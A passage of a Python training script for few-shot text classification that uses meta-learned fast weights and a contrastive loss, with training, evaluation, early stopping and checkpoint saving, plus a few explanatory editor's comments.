class_names_dict['label'])\r\n class_names_dict['text'] = class_names['text'][sampled_classes]\r\n class_names_dict['text_len'] = class_names['text_len'][sampled_classes]\r\n class_names_dict['is_support'] = False\r\n class_names_dict = utils.to_tensor(class_names_dict, args.cuda, exclude_keys=['is_support'])\r\n\r\n YS, YQ = reidx_y(args, YS, YQ)\r\n # print('YS:', support['label'])\r\n # print('YQ:', 
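\r\n    # [editor's note] The pair construction below uses explicit Python loops; an equivalent\r\n    # vectorized sketch (illustrative, not original code) pairing every support text with every\r\n    # class name, given texts [N, L] and class_names [C, L]:\r\n    #     left  = texts.repeat_interleave(C, dim=0)   # each text repeated C times -> [N*C, L]\r\n    #     right = class_names.repeat(N, 1)            # class names tiled N times  -> [N*C, L]\r\n    # so (left[k], right[k]) enumerates the same (sample, class-name) pairs the loops build.\r\n    # 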
query['label'])\r\n # print(\"class_names_dict:\", class_names_dict['label'])\r\n\r\n \"\"\"维度填充\"\"\"\r\n if support['text'].shape[1] > class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (class_names_dict['text'].shape[0], support['text'].shape[1] - class_names_dict['text'].shape[1]),\r\n dtype=torch.long)\r\n class_names_dict['text'] = torch.cat((class_names_dict['text'], zero.cuda()), dim=-1)\r\n elif support['text'].shape[1] < class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (support['text'].shape[0], class_names_dict['text'].shape[1] - support['text'].shape[1]),\r\n dtype=torch.long)\r\n support['text'] = torch.cat((support['text'], zero.cuda()), dim=-1)\r\n\r\n support['text'] = torch.cat((support['text'], class_names_dict['text']), dim=0)\r\n support['text_len'] = torch.cat((support['text_len'], class_names_dict['text_len']), dim=0)\r\n support['label'] = torch.cat((support['label'], class_names_dict['label']), dim=0)\r\n # print(\"support['text']:\", support['text'].shape)\r\n # print(\"support['label']:\", support['label'])\r\n\r\n text_sample_len = support['text'].shape[0]\r\n # print(\"support['text'].shape[0]:\", support['text'].shape[0])\r\n support['text_1'] = support['text'][0].view((1, -1))\r\n support['text_len_1'] = support['text_len'][0].view(-1)\r\n support['label_1'] = support['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n\r\n support['text_2'] = class_names_dict['text'][0].view((1, -1))\r\n support['text_len_2'] = class_names_dict['text_len'][0].view(-1)\r\n support['label_2'] = class_names_dict['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n\r\n # print(\"support['text_1']:\", support['text_1'].shape, support['text_len_1'].shape, support['label_1'].shape)\r\n # print(\"support['text_2']:\", support['text_2'].shape, support['text_len_2'].shape, support['label_2'].shape)\r\n support['label_final'] = support['label_1'].eq(support['label_2']).int()\r\n\r\n support_1 = {}\r\n support_1['text'] = support['text_1']\r\n support_1['text_len'] = support['text_len_1']\r\n support_1['label'] = 
support['label_1']\r\n\r\n support_2 = {}\r\n support_2['text'] = support['text_2']\r\n support_2['text_len'] = support['text_len_2']\r\n support_2['label'] = support['label_2']\r\n\r\n\r\n\r\n '''first step'''\r\n S_out1, S_out2 = model['G'](support_1, support_2)\r\n # print(\"-------0S1_2:\", S_out1.shape, S_out2.shape)\r\n\r\n # supp_, que_ = model['G'](support, query)\r\n # loss_weight = get_weight_of_support(supp_, que_, args)\r\n\r\n loss_weight = torch.cat(\r\n (torch.ones([args.way * args.shot * args.way]), args.train_loss_weight * torch.ones([args.way * args.way])), 0)\r\n if args.cuda != -1:\r\n loss_weight = loss_weight.cuda(args.cuda)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"**********loss first step*******\", loss)\r\n # print(\"s_1_loss:\", loss)\r\n zero_grad(model['G'].parameters())\r\n\r\n grads_fc = autograd.grad(loss, model['G'].fc.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_fc, orderd_params_fc = model['G'].cloned_fc_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].fc.named_parameters(), grads_fc):\r\n fast_weights_fc[key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n grads_conv11 = autograd.grad(loss, model['G'].conv11.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv11, orderd_params_conv11 = model['G'].cloned_conv11_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv11.named_parameters(), grads_conv11):\r\n fast_weights_conv11[key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n grads_conv12 = autograd.grad(loss, model['G'].conv12.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv12, orderd_params_conv12 = model['G'].cloned_conv12_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv12.named_parameters(), grads_conv12):\r\n fast_weights_conv12[key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n grads_conv13 = autograd.grad(loss, model['G'].conv13.parameters(), allow_unused=True)\r\n fast_weights_conv13, orderd_params_conv13 = model['G'].cloned_conv13_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv13.named_parameters(), grads_conv13):\r\n fast_weights_conv13[key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n fast_weights = {}\r\n fast_weights['fc'] = fast_weights_fc\r\n fast_weights['conv11'] = fast_weights_conv11\r\n fast_weights['conv12'] = fast_weights_conv12\r\n fast_weights['conv13'] = fast_weights_conv13\r\n\r\n '''steps remaining'''\r\n for k in range(args.train_iter - 1):\r\n S_out1, S_out2 = model['G'](support_1, support_2, fast_weights)\r\n # print(\"-------1S1_2:\", S_out1, S_out2)\r\n # supp_, que_ = model['G'](support, query, fast_weights)\r\n # loss_weight = get_weight_of_support(supp_, que_, args)\r\n\r\n loss_weight = torch.cat(\r\n (torch.ones([args.way * args.shot * args.way]), args.train_loss_weight * torch.ones([args.way * args.way])),\r\n 0)\r\n if args.cuda != -1:\r\n loss_weight = loss_weight.cuda(args.cuda)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"**********loss remain step*******\", loss)\r\n # print(\"train_iter: {} s_loss:{}\".format(k, loss))\r\n zero_grad(orderd_params_fc.values())\r\n zero_grad(orderd_params_conv11.values())\r\n zero_grad(orderd_params_conv12.values())\r\n zero_grad(orderd_params_conv13.values())\r\n grads_fc = torch.autograd.grad(loss, orderd_params_fc.values(), allow_unused=True, retain_graph=True)\r\n grads_conv11 
= torch.autograd.grad(loss, orderd_params_conv11.values(), allow_unused=True, retain_graph=True)\r\n grads_conv12 = torch.autograd.grad(loss, orderd_params_conv12.values(), allow_unused=True, retain_graph=True)\r\n grads_conv13 = torch.autograd.grad(loss, orderd_params_conv13.values(), allow_unused=True)\r\n # print('grads:', grads)\r\n # print(\"orderd_params.items():\", orderd_params.items())\r\n for (key, val), grad in zip(orderd_params_fc.items(), grads_fc):\r\n if grad is not None:\r\n fast_weights['fc'][key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv11.items(), grads_conv11):\r\n if grad is not None:\r\n fast_weights['conv11'][key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv12.items(), grads_conv12):\r\n if grad is not None:\r\n fast_weights['conv12'][key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv13.items(), grads_conv13):\r\n if grad is not None:\r\n fast_weights['conv13'][key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n \"\"\"计算Q上的损失\"\"\"\r\n CN = model['G'].forward_once_with_param(class_names_dict, fast_weights)\r\n XQ = model['G'].forward_once_with_param(query, fast_weights)\r\n logits_q = pos_dist(XQ, CN)\r\n # print(\"logits_q:\", logits_q)\r\n logits_q = dis_to_level(logits_q)\r\n q_loss = model['G'].loss(logits_q, YQ)\r\n # print(\"q_loss:\", q_loss)\r\n _, pred = torch.max(logits_q, 1)\r\n acc_q = model['G'].accuracy(pred, YQ)\r\n\r\n # optG.zero_grad()\r\n # q_loss.backward()\r\n # optG.step()\r\n\r\n return q_loss, acc_q\r\n\r\n\r\ndef train(train_data, val_data, test_data, model, class_names, criterion, args):\r\n '''\r\n Train the model\r\n Use val_data to do early stopping\r\n '''\r\n # creating a tmp directory to save the models\r\n out_dir = os.path.abspath(os.path.join(\r\n os.path.curdir,\r\n \"tmp-runs\",\r\n str(int(time.time() * 1e7))))\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n best_acc = 0\r\n sub_cycle = 0\r\n best_path = None\r\n\r\n if args.STS == True:\r\n classes_sample_p, example_prob_metrix = pre_calculate(train_data, class_names, model['G'], args)\r\n else:\r\n classes_sample_p, example_prob_metrix = None, None\r\n\r\n optG = torch.optim.Adam(grad_param(model, ['G']), lr=args.meta_lr, weight_decay=args.weight_decay)\r\n # optG2 = torch.optim.Adam(grad_param(model, ['G2']), lr=args.task_lr)\r\n # optCLF = torch.optim.Adam(grad_param(model, ['clf']), lr=args.task_lr)\r\n\r\n if args.lr_scheduler == 'ReduceLROnPlateau':\r\n schedulerG = torch.optim.lr_scheduler.ReduceLROnPlateau(\r\n optG, 'max', patience=args.patience // 2, factor=0.1, verbose=True)\r\n # schedulerCLF = torch.optim.lr_scheduler.ReduceLROnPlateau(\r\n # optCLF, 'max', patience=args.patience // 2, factor=0.1, verbose=True)\r\n\r\n elif args.lr_scheduler == 'ExponentialLR':\r\n schedulerG = torch.optim.lr_scheduler.ExponentialLR(optG, gamma=args.ExponentialLR_gamma)\r\n # schedulerCLF = torch.optim.lr_scheduler.ExponentialLR(optCLF, gamma=args.ExponentialLR_gamma)\r\n\r\n print(\"{}, Start training\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n\r\n # sampled_classes, source_classes = task_sampler(train_data, args)\r\n acc = 0\r\n loss = 0\r\n for ep in range(args.train_epochs):\r\n ep_loss = 0\r\n for _ in range(args.train_episodes):\r\n\r\n sampled_classes, source_classes = task_sampler(train_data, args, classes_sample_p)\r\n\r\n 
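# [editor's note] The inner loop of train_one above is the usual functional \"fast weights\"\r\n            # recipe; schematically (illustrative, not original code):\r\n            #     grads = torch.autograd.grad(loss, params, retain_graph=True, allow_unused=True)\r\n            #     fast_weights[name] = param - args.task_lr * grad\r\n            # The adapted conv/fc tensors are then fed through forward_once_with_param, so the\r\n            # model's real parameters are never mutated during adaptation.\r\n            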
train_gen = SerialSampler(train_data, args, sampled_classes, source_classes, 1, example_prob_metrix)\r\n\r\n sampled_tasks = train_gen.get_epoch()\r\n\r\n grad = {'clf': [], 'G': []}\r\n\r\n if not args.notqdm:\r\n sampled_tasks = tqdm(sampled_tasks, total=train_gen.num_episodes,\r\n ncols=80, leave=False, desc=colored('Training on train',\r\n 'yellow'))\r\n\r\n for task in sampled_tasks:\r\n if task is None:\r\n break\r\n q_loss, q_acc = train_one(task, class_names, model, optG, criterion, args, grad)\r\n acc += q_acc\r\n loss = loss + q_loss\r\n ep_loss = ep_loss + q_loss\r\n\r\n ep_loss = ep_loss / args.train_episodes\r\n\r\n optG.zero_grad()\r\n ep_loss.backward()\r\n optG.step()\r\n\r\n if ep % 100 == 0:\r\n print(\"{}:\".format(colored('--------[TRAIN] ep', 'blue')) + str(ep) + \", loss:\" + str(q_loss.item()) + \", acc:\" + str(\r\n q_acc.item()) + \"-----------\")\r\n\r\n test_count = 100\r\n # if (ep % test_count == 0) and (ep != 0):\r\n if (ep % test_count == 0):\r\n acc = acc / args.train_episodes / test_count\r\n loss = loss / args.train_episodes / test_count\r\n print(\"{}:\".format(colored('--------[TRAIN] ep', 'blue')) + str(ep) + \", mean_loss:\" + str(loss.item()) + \", mean_acc:\" + str(\r\n acc.item()) + \"-----------\")\r\n\r\n net = copy.deepcopy(model)\r\n # acc, std = test(train_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n # print(\"[TRAIN] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f} \".format(\r\n # datetime.datetime.now(),\r\n # \"ep\", ep,\r\n # colored(\"train\", \"red\"),\r\n # colored(\"acc:\", \"blue\"), acc, std,\r\n # ), flush=True)\r\n acc = 0\r\n loss = 0\r\n\r\n # Evaluate test accuracy\r\n cur_acc, cur_std = test(test_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n print((\"[TEST] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n \"ep\", ep,\r\n colored(\"test \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), cur_acc, cur_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # Evaluate validation accuracy\r\n cur_acc, cur_std = test(val_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n print((\"[EVAL] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n \"ep\", ep,\r\n colored(\"val \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), cur_acc, cur_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # Update the current best model if val acc is better\r\n if cur_acc > best_acc:\r\n best_acc = cur_acc\r\n best_path = os.path.join(out_dir, str(ep))\r\n\r\n # save current model\r\n print(\"{}, Save cur best model to {}\".format(\r\n datetime.datetime.now(),\r\n best_path))\r\n\r\n torch.save(model['G'].state_dict(), best_path + '.G')\r\n # torch.save(model['G2'].state_dict(), best_path + '.G2')\r\n # torch.save(model['clf'].state_dict(), best_path + '.clf')\r\n\r\n sub_cycle = 0\r\n else:\r\n sub_cycle += 1\r\n\r\n # Break if the val acc hasn't improved in the past patience epochs\r\n if sub_cycle == args.patience:\r\n break\r\n\r\n if args.lr_scheduler == 'ReduceLROnPlateau':\r\n schedulerG.step(cur_acc)\r\n # schedulerCLF.step(cur_acc)\r\n\r\n elif args.lr_scheduler == 
'ExponentialLR':\r\n schedulerG.step()\r\n # schedulerCLF.step()\r\n\r\n print(\"{}, End of training. Restore the best weights\".format(\r\n datetime.datetime.now()),\r\n flush=True)\r\n\r\n # restore the best saved model\r\n model['G'].load_state_dict(torch.load(best_path + '.G'))\r\n # model['G2'].load_state_dict(torch.load(best_path + '.G2'))\r\n # model['clf'].load_state_dict(torch.load(best_path + '.clf'))\r\n\r\n if args.save:\r\n # save the current model\r\n out_dir = os.path.abspath(os.path.join(\r\n os.path.curdir,\r\n \"saved-runs\",\r\n str(int(time.time() * 1e7))))\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n best_path = os.path.join(out_dir, 'best')\r\n\r\n print(\"{}, Save best model to {}\".format(\r\n datetime.datetime.now(),\r\n best_path), flush=True)\r\n\r\n torch.save(model['G'].state_dict(), best_path + '.G')\r\n # torch.save(model['clf'].state_dict(), best_path + '.clf')\r\n\r\n with open(best_path + '_args.txt', 'w') as f:\r\n for attr, value in sorted(args.__dict__.items()):\r\n f.write(\"{}={}\\n\".format(attr, value))\r\n\r\n return optG\r\n\r\n\r\ndef test_one(task, class_names, model, optG, criterion, args, grad):\r\n '''\r\n Train the model on one sampled task.\r\n '''\r\n model['G'].eval()\r\n\r\n support, query = task\r\n # print(\"support, query:\", support, query)\r\n # print(\"class_names_dict:\", class_names_dict)\r\n\r\n '''分样本对'''\r\n YS = support['label']\r\n YQ = query['label']\r\n\r\n sampled_classes = torch.unique(support['label']).cpu().numpy().tolist()\r\n # print(\"sampled_classes:\", sampled_classes)\r\n\r\n class_names_dict = {}\r\n class_names_dict['label'] = class_names['label'][sampled_classes]\r\n # print(\"class_names_dict['label']:\", class_names_dict['label'])\r\n class_names_dict['text'] = class_names['text'][sampled_classes]\r\n class_names_dict['text_len'] = class_names['text_len'][sampled_classes]\r\n class_names_dict['is_support'] = False\r\n class_names_dict = utils.to_tensor(class_names_dict, args.cuda, exclude_keys=['is_support'])\r\n\r\n YS, YQ = reidx_y(args, YS, YQ)\r\n # print('YS:', support['label'])\r\n # print('YQ:', query['label'])\r\n # print(\"class_names_dict:\", class_names_dict['label'])\r\n\r\n \"\"\"维度填充\"\"\"\r\n if support['text'].shape[1] > class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (class_names_dict['text'].shape[0], support['text'].shape[1] - class_names_dict['text'].shape[1]),\r\n dtype=torch.long)\r\n class_names_dict['text'] = torch.cat((class_names_dict['text'], zero.cuda()), dim=-1)\r\n elif support['text'].shape[1] < class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (support['text'].shape[0], class_names_dict['text'].shape[1] - support['text'].shape[1]),\r\n dtype=torch.long)\r\n support['text'] = torch.cat((support['text'], zero.cuda()), dim=-1)\r\n\r\n support['text'] = torch.cat((support['text'], class_names_dict['text']), dim=0)\r\n support['text_len'] = torch.cat((support['text_len'], class_names_dict['text_len']), dim=0)\r\n support['label'] = torch.cat((support['label'], class_names_dict['label']), dim=0)\r\n # print(\"support['text']:\", support['text'].shape)\r\n # print(\"support['label']:\", support['label'])\r\n\r\n text_sample_len = support['text'].shape[0]\r\n # print(\"support['text'].shape[0]:\", support['text'].shape[0])\r\n support['text_1'] = support['text'][0].view((1, -1))\r\n support['text_len_1'] = support['text_len'][0].view(-1)\r\n support['label_1'] = support['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if 
i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n\r\n support['text_2'] = class_names_dict['text'][0].view((1, -1))\r\n support['text_len_2'] = class_names_dict['text_len'][0].view(-1)\r\n support['label_2'] = class_names_dict['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n\r\n # print(\"support['text_1']:\", support['text_1'].shape, support['text_len_1'].shape, support['label_1'].shape)\r\n # print(\"support['text_2']:\", support['text_2'].shape, support['text_len_2'].shape, support['label_2'].shape)\r\n support['label_final'] = support['label_1'].eq(support['label_2']).int()\r\n\r\n support_1 = {}\r\n support_1['text'] = support['text_1']\r\n support_1['text_len'] = support['text_len_1']\r\n support_1['label'] = support['label_1']\r\n\r\n support_2 = {}\r\n support_2['text'] = support['text_2']\r\n support_2['text_len'] = support['text_len_2']\r\n support_2['label'] = support['label_2']\r\n # print(\"**************************************\")\r\n # print(\"1111111\", support['label_1'])\r\n # print(\"2222222\", support['label_2'])\r\n # print(support['label_final'])\r\n\r\n '''first step'''\r\n S_out1, S_out2 = model['G'](support_1, support_2)\r\n\r\n supp_, que_ = model['G'](support, query)\r\n loss_weight = get_weight_of_test_support(supp_, que_, args)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"s_1_loss:\", loss)\r\n zero_grad(model['G'].parameters())\r\n\r\n grads_fc = autograd.grad(loss, model['G'].fc.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_fc, orderd_params_fc = model['G'].cloned_fc_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].fc.named_parameters(), grads_fc):\r\n fast_weights_fc[key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n grads_conv11 = autograd.grad(loss, model['G'].conv11.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv11, orderd_params_conv11 = model['G'].cloned_conv11_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv11.named_parameters(), grads_conv11):\r\n fast_weights_conv11[key] = orderd_params_conv11[key] = val - args.task_lr * 
grad\r\n\r\n grads_conv12 = autograd.grad(loss, model['G'].conv12.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv12, orderd_params_conv12 = model['G'].cloned_conv12_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv12.named_parameters(), grads_conv12):\r\n fast_weights_conv12[key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n grads_conv13 = autograd.grad(loss, model['G'].conv13.parameters(), allow_unused=True)\r\n fast_weights_conv13, orderd_params_conv13 = model['G'].cloned_conv13_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv13.named_parameters(), grads_conv13):\r\n fast_weights_conv13[key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n\r\n fast_weights = {}\r\n fast_weights['fc'] = fast_weights_fc\r\n fast_weights['conv11'] = fast_weights_conv11\r\n fast_weights['conv12'] = fast_weights_conv12\r\n fast_weights['conv13'] = fast_weights_conv13\r\n\r\n '''steps remaining'''\r\n for k in range(args.test_iter - 1):\r\n S_out1, S_out2 = model['G'](support_1, support_2, fast_weights)\r\n\r\n supp_, que_ = model['G'](support, query, fast_weights)\r\n loss_weight = get_weight_of_test_support(supp_, que_, args)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"train_iter: {} s_loss:{}\".format(k, loss))\r\n zero_grad(orderd_params_fc.values())\r\n zero_grad(orderd_params_conv11.values())\r\n zero_grad(orderd_params_conv12.values())\r\n zero_grad(orderd_params_conv13.values())\r\n grads_fc = torch.autograd.grad(loss, orderd_params_fc.values(), allow_unused=True, retain_graph=True)\r\n grads_conv11 = torch.autograd.grad(loss, orderd_params_conv11.values(), allow_unused=True, retain_graph=True)\r\n grads_conv12 = torch.autograd.grad(loss, orderd_params_conv12.values(), allow_unused=True, retain_graph=True)\r\n grads_conv13 = torch.autograd.grad(loss, orderd_params_conv13.values(), allow_unused=True)\r\n\r\n for (key, val), grad in zip(orderd_params_fc.items(), grads_fc):\r\n if grad is not None:\r\n fast_weights['fc'][key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv11.items(), grads_conv11):\r\n if grad is not None:\r\n fast_weights['conv11'][key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv12.items(), grads_conv12):\r\n if grad is not None:\r\n fast_weights['conv12'][key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv13.items(), grads_conv13):\r\n if grad is not None:\r\n fast_weights['conv13'][key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n \"\"\"计算Q上的损失\"\"\"\r\n CN = model['G'].forward_once_with_param(class_names_dict, fast_weights)\r\n XQ = model['G'].forward_once_with_param(query, fast_weights)\r\n logits_q = pos_dist(XQ, CN)\r\n logits_q = dis_to_level(logits_q)\r\n _, pred = torch.max(logits_q, 1)\r\n acc_q = model['G'].accuracy(pred, YQ)\r\n\r\n return acc_q\r\n\r\n\r\ndef test(test_data, class_names, optG, model, criterion, args, test_epoch, verbose=True):\r\n '''\r\n Evaluate the model on a bag of sampled tasks. 
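and its std.\r\n\r\n    [editor's note] Sketch of the summary computed here, assuming per-episode accuracies were\r\n    collected in a list (the figure after the +/- sign is the raw std over episodes, not a\r\n    confidence interval):\r\n        accs = np.array([0.81, 0.79, 0.84])      # illustrative values\r\n        summary = (np.mean(accs), np.std(accs))  # what this function returns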
Return the mean accuracy\r\n and its std.\r\n '''\r\n # model['G'].train()\r\n\r\n acc = []\r\n\r\n for ep in range(test_epoch):\r\n #print(\"**********************test ep******************************\",ep)\r\n\r\n sampled_classes, source_classes = task_sampler(test_data, args)\r\n\r\n train_gen = SerialSampler(test_data, args, sampled_classes, source_classes, 1)\r\n\r\n sampled_tasks = train_gen.get_epoch()\r\n\r\n for task in sampled_tasks:\r\n if task is None:\r\n break\r\n q_acc = test_one(task, class_names, model, optG, criterion, args, grad={})\r\n acc.append(q_acc.cpu().item())\r\n\r\n acc = np.array(acc)\r\n\r\n if verbose:\r\n if args.embedding != 'mlada':\r\n print(\"{}, {:s} {:>7.4f}, {:s} {:>7.4f}\".format(\r\n datetime.datetime.now(),\r\n colored(\"test acc mean\", \"blue\"),\r\n np.mean(acc),\r\n colored(\"test std\", \"blue\"),\r\n np.std(acc),\r\n ), flush=True)\r\n else:\r\n print(\"{}, {:s} {:>7.4f}, {:s} {:>7.4f}\".format(\r\n datetime.datetime.now(),\r\n colored(\"test acc mean\", \"blue\"),\r\n np.mean(acc),\r\n colored(\"test std\", \"blue\"),\r\n np.std(acc),\r\n ), flush=True)\r\n\r\n return np.mean(acc), np.std(acc)\r\n\r\n\r\ndef main():\r\n args = parse_args()\r\n\r\n # 可以打印到本地!存储下来\r\n if args.path != \"\":\r\n path = args.path\r\n sys.stdout = open(path, \"w\")\r\n print(\"test sys.stdout\")\r\n\r\n print_args(args)\r\n\r\n set_seed(args.seed)\r\n\r\n # load data\r\n train_data, val_data, test_data, class_names, vocab = loader.load_dataset(args)\r\n\r\n args.id2word = vocab.itos\r\n\r\n # initialize model\r\n model = {}\r\n model[\"G\"] = get_embedding(vocab, args)\r\n print(\"-------------------------------------param----------------------------------------------\")\r\n sum = 0\r\n for name, param in model[\"G\"].named_parameters():\r\n num = 1\r\n for size in param.shape:\r\n num *= size\r\n sum += num\r\n print(\"{:30s} : {}\".format(name, param.shape))\r\n print(\"total param num {}\".format(sum))\r\n print(\"-------------------------------------param----------------------------------------------\")\r\n\r\n criterion = ContrastiveLoss()\r\n # model[\"G2\"] = get_embedding_M2(vocab, args)\r\n # model[\"clf\"] = get_classifier(model[\"G\"].hidden_size * 2, args)\r\n\r\n if args.mode == \"train\":\r\n # train model on train_data, early stopping based on val_data\r\n optG = train(train_data, val_data, test_data, model, class_names, criterion, args)\r\n\r\n # val_acc, val_std, _ = test(val_data, model, args,\r\n # args.val_episodes)\r\n\r\n test_acc, test_std = test(test_data, class_names, optG, model, criterion, args, args.test_epochs, False)\r\n print((\"[TEST] {}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n colored(\"test \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), test_acc, test_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # path_drawn = args.path_drawn_data\r\n # with open(path_drawn, 'w') as f_w:\r\n # json.dump(drawn_data, f_w)\r\n # print(\"store drawn data finished.\")\r\n\r\n # file_path = r'../data/attention_data.json'\r\n # Print_Attention(file_path, vocab, model, args)\r\n\r\n if args.result_path:\r\n directory = args.result_path[:args.result_path.rfind(\"/\")]\r\n if not os.path.exists(directory):\r\n os.mkdirs(directory)\r\n\r\n result = {\r\n \"test_acc\": test_acc,\r\n \"test_std\": test_std,\r\n # \"val_acc\": val_acc,\r\n # \"val_std\": 
